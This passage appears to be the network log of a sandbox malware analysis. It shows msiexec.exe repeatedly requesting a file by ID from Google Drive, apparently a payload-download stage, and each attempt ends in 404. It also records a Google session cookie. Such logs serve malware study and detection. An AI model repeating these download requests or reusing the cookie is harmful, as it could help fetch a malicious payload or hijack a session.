                                                                                          Set-Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi; expires=Sat, 12-Jul-2025 14:16:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:16:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 2d 73 6a 6c 31 30 36 30 6f 58 78 73 76 56 51 6a 42 31 50 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="m-sjl1060oXxsvVQjB1P4A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.649935142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:01 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:01 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:01 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-aw-Y8r_UWJQjIU0cdxRT_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.649943216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:02 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:03 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQ6BhDpkV-D47NIWF0-Ojw0sI9rWVmwb9i0W_PbqZSxqMrdsHEJYI-tvEt5tWGqq6MK
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:03 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-gTuLSh2rz4pzG4Zk2X10ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 6c 79 74 56 38 44 78 47 56 38 54 44 64 35 76 42 61 34 74 48 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4lytV8DxGV8TDd5vBa4tHQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.649953142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:04 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:04 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:04 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: script-src 'nonce-0272hEQtgnCCu57-S4yljQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.649960216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:05 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:05 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC5JD61p-3jHVETiBQwQs1VdrMBP95nXD9sjHgdSmmuisaEFojM56f9ALz3swoaf351z0tRu03Q
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:05 GMT
                                                                                          Content-Security-Policy: script-src 'nonce-_lIDVz7X4GZ-V5juSLMypQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 38 52 43 35 37 4b 66 62 6d 54 61 4e 30 61 48 76 59 41 45 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="G8RC57KfbmTaN0aHvYAEiw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.649967142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:06 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:06 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:06 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Ca2t5MwWG-JO2cIILihIxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.649977216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:07 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:07 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC6wFiivyFR-jzU_7D4PVCfCqCve-wMA0xiI0DibY0iQlVikRIj5p5LpRyQE1iy6ThheSIncrRs
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:07 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-LN5e9uG0OIcbfAkHIs1wXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 49 46 69 55 6f 37 36 36 72 48 65 2d 77 30 41 42 52 45 48 71 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7IFiUo766rHe-w0ABREHqg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.649985142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:08 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:09 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:08 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-6roxFvSyTPWxH7RXmmqOuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.649992216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:09 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
